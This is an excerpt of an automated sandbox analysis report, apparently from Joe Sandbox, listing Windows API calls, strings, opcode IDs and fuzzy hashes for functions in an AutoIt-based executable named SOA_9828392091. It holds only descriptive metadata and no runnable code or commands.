                                      • Instruction Fuzzy Hash: C031F871800119ABCF11EFA4CC85AEEBFB9FF58710F100015E815B6266EA31A95ADFA0
                                      APIs
                                      • DestroyWindow.USER32(?,?,?,?), ref: 0099980E
                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0099984A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$DestroyMove
                                      • String ID: static
                                      • API String ID: 2139405536-2160076837
                                      • Opcode ID: bdf1d0ce920ac9a86c02d823e1ff1bb1475a21ffbf3830abb6ac405358e740f6
                                      • Instruction ID: b8fc30ae1e8a6df2800817671a9daea3cc85b7761b7442b1a9f927cc9e147f36
                                      • Instruction Fuzzy Hash: 01315871110604AAEF209F79CC81BBB77ADFF99764F10861DF9A9C7190DA31AC81DB60
                                      APIs
                                      • _memset.LIBCMT ref: 009751C6
                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00975201
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: InfoItemMenu_memset
                                      • String ID: 0
                                      • API String ID: 2223754486-4108050209
                                      • Opcode ID: b94e08eed4e99acc7e673ead219a0ea5a3ccc1fee76aa9f47874f46aa2762250
                                      • Instruction ID: b2d4352bdfc7c68240e20a54865db1dd919ee3e4651cf6fa0882af8fc215d9d0
                                      • Instruction Fuzzy Hash: 4E312873600304DBEBA4CF99D845BAEBBFCFF85350F158019E9A9A61A1D7F09944CB50
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __snwprintf
                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                      • API String ID: 2391506597-2584243854
                                      • Opcode ID: f8cad7848d4b7bf63ed7b49d4036099f3265d363e323fac953a3acf290a4d44e
                                      • Instruction ID: 14eacb6aac4759e25f6c9cf0fc1bc33517a3bc02f9024c7973eb8f4e502c15ce
                                      • Instruction Fuzzy Hash: 05216F71A00259ABCF11EFA5D882FAD77B4AF89704F004459F515AB281DB70EE45CFA1
                                      APIs
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0099945C
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00999467
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: Combobox
                                      • API String ID: 3850602802-2096851135
                                      • Opcode ID: 8892be370be747bdcba05e97cc48d9237c4f6e19f14d8902cc7f561b6c08c3d6
                                      • Instruction ID: 5aea2e56a5e1d7e769f3679ecaefb9a1bbf5233b4a48bfb8909db561263eba0d
                                      • Instruction Fuzzy Hash: 51118271310218AFEF26DF5CDC81EBB376FEB983A4F104129F919972A0D6719C529760
                                      APIs
                                        • Part of subcall function 0094D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0094D1BA
                                        • Part of subcall function 0094D17C: GetStockObject.GDI32(00000011), ref: 0094D1CE
                                        • Part of subcall function 0094D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0094D1D8
                                      • GetWindowRect.USER32(00000000,?), ref: 00999968
                                      • GetSysColor.USER32(00000012), ref: 00999982
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                      • String ID: static
                                      • API String ID: 1983116058-2160076837
                                      • Opcode ID: 9b9b0d323c78ae45ae6634d565f1a7e7ec7b1b0937d6002924795d568c9f5e15
                                      • Instruction ID: f9724ffb69e8a0aa186cfbcc92d92fde25dbddedef590b166c65f6742f31ca60
                                      • Instruction Fuzzy Hash: 90112672520209AFDF04DFB8CC45AEA7BA8FB48354F01462CFD55E2250E735E850DB60
                                      APIs
                                      • GetWindowTextLengthW.USER32(00000000), ref: 00999699
                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009996A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: LengthMessageSendTextWindow
                                      • String ID: edit
                                      • API String ID: 2978978980-2167791130
                                      • Opcode ID: 2365dbd8b924620ff06f075ff4671cb20269f970c8f52b340ed60c1a0d296c87
                                      • Instruction ID: 3f8a2f7c5d5c257c8c8055445e474e417ef44b47892f5eb064d1e0c52c4f4872
                                      • Instruction Fuzzy Hash: 1D119A71510108AAEF108F6CDC40EEB3B6EEB05378F100728F965931E0C7369C50A760
                                      APIs
                                      • _memset.LIBCMT ref: 009752D5
                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 009752F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: InfoItemMenu_memset
                                      • String ID: 0
                                      • API String ID: 2223754486-4108050209
                                      • Opcode ID: 745340878b8095b8114ba195028f1e35819153089b27815a394e4fdba92dfaff
                                      • Instruction ID: 03c01d05aaeec70c59e375d04bc1d2aab0b4de353cfd8f656e710ba124af8c15
                                      • Instruction Fuzzy Hash: 6411D073A01614EBDBA0DA98D904BAD77BDAB45790F068125E91DA72A0E3F0AD04C790
                                      APIs
                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00984DF5
                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00984E1E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Internet$OpenOption
                                      • String ID: <local>
                                      • API String ID: 942729171-4266983199
                                      • Opcode ID: 684087cba1379733c6230152dbdc7594bc9964db57f9831603f56a77434cb355
                                      • Instruction ID: 4ddff201e1d3a90abb79d6d873427ab8000f5991db4b155fd8ef9ab1eac38a4a
                                      • Instruction Fuzzy Hash: 59119EB1501222BADB259F51C888EEBFAACFF06755F10862AF50596280E6746940D7E0
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: htonsinet_addr
                                      • String ID: 255.255.255.255
                                      • API String ID: 3832099526-2422070025
                                      • Opcode ID: 98c3e73466f6cc04dc20d57ce6655a897ba76ff67465dda2cf629183ec2842c1
                                      • Instruction ID: c5d8b49496e8e9ccc4154c1ca3239fb06b7dc55b6f39594163b974297e3132a2
                                      • Instruction Fuzzy Hash: D301F9B5200305ABDB21EF64C886FADB368EF44320F108527F516973D1D771E801C762
                                      APIs
                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0096B7EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 3850602802-1403004172
                                      • Opcode ID: 8c8550fa9e5a09c50ef3b67fb0e35f3a89e8d5b4484e54e00900845378fa5c73
                                      • Instruction ID: e1c44f8785466582d9be77bd34f80b4e20f78d647cc818944cd943f60aaf5b0e
                                      • Instruction Fuzzy Hash: 7501D4B1A41118ABCB04EBA4CC52AFE737DBF95350B04062DF472A72D2EB745D08CB90
                                      APIs
                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 0096B6EB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 3850602802-1403004172
                                      • Opcode ID: 482243f18d7b44f3315ec8d80e015b3dcd5d41f73049826976c06d9435bed94a
                                      • Instruction ID: 0e29491cce278c2c2855fe5c8164e01dd8620700750d2e33fdf8be6329bfbdc8
                                      • Instruction Fuzzy Hash: 71016DB1A41108ABCB15EBA4C962BFE73BD9F85354F100029B502B32D2EB545E189BB5
                                      APIs
                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 0096B76C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 3850602802-1403004172
                                      • Opcode ID: 34d137b700de6ec357c42103cd60f830bc9ab0a3b66d98fc2eecc2fd93cf0dd4
                                      • Instruction ID: 743c13c2328db9188a31a553fe160f038507e5255d65a7fc550e99fd93705dcd
                                      • Instruction Fuzzy Hash: 8401D1B2A41108ABCB01EBA4CA12FFE73AC9B85344F100029B402F31D2EB645F099BB5
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ClassName_wcscmp
                                      • String ID: #32770
                                      • API String ID: 2292705959-463685578
                                      • Opcode ID: e9cb81fa07ff0b9c16abcb122f94434398699d77f32f72bd0d42496889c1a671
                                      • Instruction ID: bfc7f6ff1133c1be771ab9c0cc197dac86b1b748d50ea3a8a34a248a715b81d8
                                      • Opcode Fuzzy Hash: e9cb81fa07ff0b9c16abcb122f94434398699d77f32f72bd0d42496889c1a671
                                      • Instruction Fuzzy Hash: B1E0927760422567D710EAA6DC0AF9BFBACAB91B64F004156B905D3041E670AA4587D4
                                      APIs
                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0096A63F
                                        • Part of subcall function 009513F1: _doexit.LIBCMT ref: 009513FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Message_doexit
                                      • String ID: AutoIt$Error allocating memory.
                                      • API String ID: 1993061046-4017498283
                                      • Opcode ID: 50821222b4dce17091f4ec170d7a12efd0f4f841041206fa084fcd60eb675405
                                      • Instruction ID: cd6fcdc8bc08646c8cf38e528f1520915649a371565192c4f25a7739117b6f36
                                      • Opcode Fuzzy Hash: 50821222b4dce17091f4ec170d7a12efd0f4f841041206fa084fcd60eb675405
                                      • Instruction Fuzzy Hash: EFD02B313C531833C21436996D17FC8364CCB84B65F040025BB08950C349E6894002DA
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(?), ref: 009AACC0
                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 009AAEBD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: DirectoryFreeLibrarySystem
                                      • String ID: WIN_XPe
                                      • API String ID: 510247158-3257408948
                                      • Opcode ID: 27e31bd88bf5c58d805a86514fa66c2fe419d03a512e6839232946b1b47f4347
                                      • Instruction ID: 5350aee7c2768fc15d0b58f4b27749b49f52e3c0c6c9be76a28a54c6e15333b3
                                      • Opcode Fuzzy Hash: 27e31bd88bf5c58d805a86514fa66c2fe419d03a512e6839232946b1b47f4347
                                      • Instruction Fuzzy Hash: C8E09B70C15149DFDB15DFA5DD44AECF7BCAB49310F108181E052B2260D7344A44DF21
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009986A2
                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009986B5
                                        • Part of subcall function 00977A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00977AD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: d171127bf59a31eb0cf5051dfe45d6b7e21e372f7e041ea6e31addac8d8eb28d
                                      • Instruction ID: c30882a6a344f4208ad884329c18c738f25d32e66119bb4280e39282028d384f
                                      • Opcode Fuzzy Hash: d171127bf59a31eb0cf5051dfe45d6b7e21e372f7e041ea6e31addac8d8eb28d
                                      • Instruction Fuzzy Hash: 03D0A932399314B7E22863709C0BFC66A089B40B20F000914B609AA1C0C8E0A9008A10
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009986E2
                                      • PostMessageW.USER32(00000000), ref: 009986E9
                                        • Part of subcall function 00977A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00977AD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: ff8c0a13e003e3868fd0e276dd6f4e12754e4e1dab940b59ab18fc21be73f61c
                                      • Instruction ID: 9662cc973363f3bc0653123d42edaf321bbc07691787e3b4a728f7c4a16b43fb
                                      • Opcode Fuzzy Hash: ff8c0a13e003e3868fd0e276dd6f4e12754e4e1dab940b59ab18fc21be73f61c
                                      • Instruction Fuzzy Hash: 70D0A93238A314BBF22963709C0BFC66A089B44B20F000914B609AA1C0C8E0A9008A14